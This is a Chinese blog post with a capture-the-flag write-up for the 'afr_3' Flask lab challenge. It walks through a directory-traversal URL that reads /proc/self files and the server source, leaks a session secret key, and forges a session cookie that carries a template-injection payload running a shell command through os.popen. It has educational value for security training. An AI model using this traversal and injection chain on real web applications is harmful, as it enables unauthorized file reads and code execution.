《从0到1:CTFer成长之路》afr_3

于 2022-01-16 21:29:21 发布
阅读量1.3k 收藏 4
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 《从0到1:CTFer成长之路》 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43651049/article/details/122525820
本文介绍了一个名为afr_3的靶场挑战,详细讲述了利用目录穿越、模板注入等技术手段解题的过程,最终获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

靶场:afr_3

在这里插入图片描述

知识点

解题过程

  1. 检查首页,在输入框随便输入,并根据引导进入下一个页面
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  2. 查看URL:
    http://9ba2d619-5c5e-4585-ab9e-9dc74f397e14.node4.buuoj.cn:81/article?name=article
    通过?name=article可以考虑目录穿越
    http://9ba2d619-5c5e-4585-ab9e-9dc74f397e14.node4.buuoj.cn:81/article?name=../../../../../proc/self/cmdline
    在这里插入图片描述

  3. 由于不知道具体路径,查看server.py
    http://9ba2d619-5c5e-4585-ab9e-9dc74f397e14.node4.buuoj.cn:81/article?name=../../../../../proc/self/cwd/server.py
    在这里插入图片描述是一段python代码

    #!/usr/bin/python 
import os from flask 
import ( Flask, render_template, request, url_for, redirect, session, render_template_string ) from flask_session 
import Session 
app = Flask(__name__) 
execfile('flag.py') 
execfile('key.py') 
FLAG = flag 
app.secret_key = key 

@app.route("/n1page", methods=["GET", "POST"]) 
def n1page(): 
	if request.method != "POST": 
		return redirect(url_for("index")) 
	n1code = request.form.get("n1code") or None 
	if n1code is not None: n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","") 
if "n1code" not in session or session['n1code'] is None: session['n1code'] = n1code template = None 
if session['n1code'] is not None: template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code'] session['n1code'] = None 
return render_template_string(template) @app.route("/", methods=["GET"])
 
 
def index(): 
	return render_template("main.html") @app.route('/article', methods=['GET']) 
	
	
def article(): error = 0 


if 'name' in request.args: 
	page = request.args.get('name') 
else: 
	page = 'article' 
if page.find('flag')>=0: page = 'notallowed.txt' 
try: 
	template = open('/home/nu11111111l/articles/{}'.format(page)).read() 
except Exception as e: 
	template = e 
return render_template('article.html', template=template) 
if __name__ == "__main__": app.run(host='0.0.0.0', debug=False)

    包含两个文件:
    在这里插入图片描述

  4. 查看两个文件
    flag.py
    在这里插入图片描述
    key.py
    在这里插入图片描述得到key:'Drmhze6EPcv0fN_81Bj-nA’

  5. 伪造session
    密钥:Drmhze6EPcv0fN_81Bj-nA
    构造ssti模板注入:{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}

    ┌──(root💀kali)-[/tools/flask-session-cookie-manager]
└─# python3 ./flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"


.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.YeQW8g.wLvMGqu7CxX5T08df5bzcUd3nw8

    得到cookie:.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.YeQW8g.wLvMGqu7CxX5T08df5bzcUd3nw8

  6. 通过burpsuite抓包上传cookie得到flag
    在这里插入图片描述

flag:n1book{afr_3_solved}

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ZhShy23

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值